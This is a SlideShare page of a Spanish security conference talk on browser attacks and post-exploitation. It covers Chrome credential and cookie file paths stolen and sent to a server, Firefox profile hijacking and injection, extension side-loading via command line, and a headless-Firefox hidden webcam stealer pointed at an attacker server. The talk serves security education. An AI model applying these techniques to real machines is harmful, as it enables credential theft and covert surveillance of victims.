Troyanos
Your SlideShare is downloading.
×
Check these out next
More Related Content
Similar to Seguridad en navegadores web #bitup2018 (20)
Recently uploaded (20)
Seguridad en navegadores web #bitup2018
- 1. Seguridad en Navegadores Web #bitup2018 @j0moz4
- 2. QUÉ ES ESTO... Seguridad en navegadores web (chrome & firefox) Algunas técnicas ofensivas (PoCs) “Post-Explotación” Sencillos scripts en python y javascript Puntos de partida para desarrollar Hi!Bro
- 3. ZeuS Web Browser Trojan - Se detectó por primera vez en el año 2007 en EE. UU. - Afectó a los navegadores IE y Firefox (Windows) - 3.6 millones de ordenadores infectados (2009) - Puerta de entrada a otros troyanos.
- 4. ZeuS Web Browser Trojan
- 5. Principales características de ZeuS Keystroke logging - Consiste en almacenar un registro con las pulsaciones físicas de un teclado. Form grabbing - Es un tipo de malware, que trabaja recuperando las credenciales de autorización y registros de un formulario web.
- 6. MALICIOUS EXTENSIONS
- 7. MALICIOUS EXTENSIONS
- 8. MALICIOUS EXTENSIONS
- 9. MALICIOUS EXTENSIONS
- 10. Browser as a target
- 11. Browser Stealer - Cookies - Password - Postdata - Credit Cards - Session tokens
- 12. BROWSER STEALER
- 13. BROWSER STEALER BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE) ● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data" VICTIM Run payload.exe...
- 14. BROWSER STEALER BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE) ● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data" ● %APPDATA%LocalGoogleChromeUser DataDefaultCookies" ● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data" ○ Autocomplete, bank cards, browser searches ● %APPDATA%LocalGoogleChromeUser DataDefaultHistory" ○ browsing and downloads history VICTIM Run payload.exe...
- 15. BROWSER STEALER VICTI Run payload.exe... SERVER logins, history, cookies, cc’s... (base64Encoded) VICTIM BROWSERS LOCAL DATA (IN CHROME ON WIN MACHINE) ● %APPDATA%LocalGoogleChromeUser DataDefaultLogin Data" ● %APPDATA%LocalGoogleChromeUser DataDefaultCookies" ● %APPDATA%LocalGoogleChromeUser DataDefaultWeb Data" ○ Autocomplete, bank cards, browser searches ● %APPDATA%LocalGoogleChromeUser DataDefaultHistory" ○ browsing and downloads history
- 16. Profile Hijacking & Injection
- 17. Profile Hijacking Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles ● firefox.exe -createProfile “<profName profPath>” ● firefox.exe -P VICTIM Run payload.exe...
- 18. Profile Hijacking VICTI Run payload.exe... SERVER GZIP Profiles Folders VICTIM Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles ● firefox.exe -createProfile “<profName profPath>” ● firefox.exe -P
- 19. Profile Hijacking VICTI Run payload.exe... SERVER GZIP Profiles Folders VICTIM Todo lo que tal se guarda en un perfil %AppData%RoamingMozillaFirefoxProfiles ● firefox.exe -createProfile “<profName profPath>” ● firefox.exe -P Unzip and create the new profile SERVER
- 20. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini VICTIM Run payload.exe...
- 21. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini VICTIM Run payload.exe...
- 22. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini VICTIM Run payload.exe...
- 23. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini VICTI Run payload.exe... VICTI Run payload.exe... SERVER Inject fake profiles.ini (no need permissions) VICTIM
- 24. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini prefs.js ( about:config ) VICTI Run payload.exe...Run payload.exe... SERVER Inject fake profiles.ini (no need permissions) VICTIM
- 25. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini prefs.js ( about:config ) VICTIM Run payload.exe... VICTIM Run payload.exe... SERVER Inject fake profiles.ini (no need permissions) VICTIM
- 26. Profile Injection %AppData%RoamingMozillaFirefoxprofiles.ini prefs.js ( about:config ) VICTIM Run payload.exe... VICTIM Run payload.exe... SERVER Inject fake profiles.ini (no need permissions) VICTIM
- 27. Headless Browser
- 28. HEADLESS BROWSER ● Navegador web sin una interfaz gráfica ● Se pueden tomar screenshots. ● “No aparece en el administrador de tareas”
- 29. HEADLESS BROWSER ● Navegador web sin una interfaz gráfica ● Se pueden tomar screenshots. ● “No aparece en el administrador de tareas” DEMO
- 30. ABOUT EXTENSIONS...
- 31. ABOUT EXTENSIONS... Malicious extensions Extensions can: ● Inject JAVASCRIPT in browsing ● Modify DOM ● Execute JS in background
- 32. ABOUT EXTENSIONS... extension.crx (zip)
- 33. ABOUT EXTENSIONS... extension.crx (zip)
- 34. ABOUT EXTENSIONS... extension.crx (zip)
- 35. ABOUT EXTENSIONS... extension.crx (zip)
- 36. ABOUT EXTENSIONS... extension.crx (zip) chrome.exe --load-extension=”Extension Path” chrome.exe --load-extension=”Extension Path” “http://<webpage>/”
- 37. The wonderful world of client side hacking
- 38. The wonderful world of client side hacking HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER
- 39. The wonderful world of client side hacking HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
- 40. The wonderful world of client side hacking HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT
- 41. The wonderful world of client side hacking HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT MEDIA.NAVIGATOR.PERMISSION.DISABLED
- 42. The wonderful world of client side hacking HIDDEN WEBCAM STEALER WITH HEADLESS BROWSER PROFILE INJECTION + HEADLESS FIREFOX + JAVASCRIPT Run payload.exe... VICTIM profile injection; firefox.exe -headless “http://recserver/”
- 43. CHROME GPO’s C:WindowsPolicyDefinitions C:WindowsPolicyDefinitionses-ES
- 44. CHROME GPO’s
- 45. CHROME GPO’s
- 46. CHROME GPO’s
- 47. CHROME GPO’s
- 48. CHROME GPO’s
- 49. CONCLUSIONES - Hacking browser (Profile Hijacking) - Client-Side Hacking (MITB) Muchas más cosas: - Master chrome file - Selenium - Headless remote debug port - Mucho javascript por aprender...
- 50. GRACIAS :-)
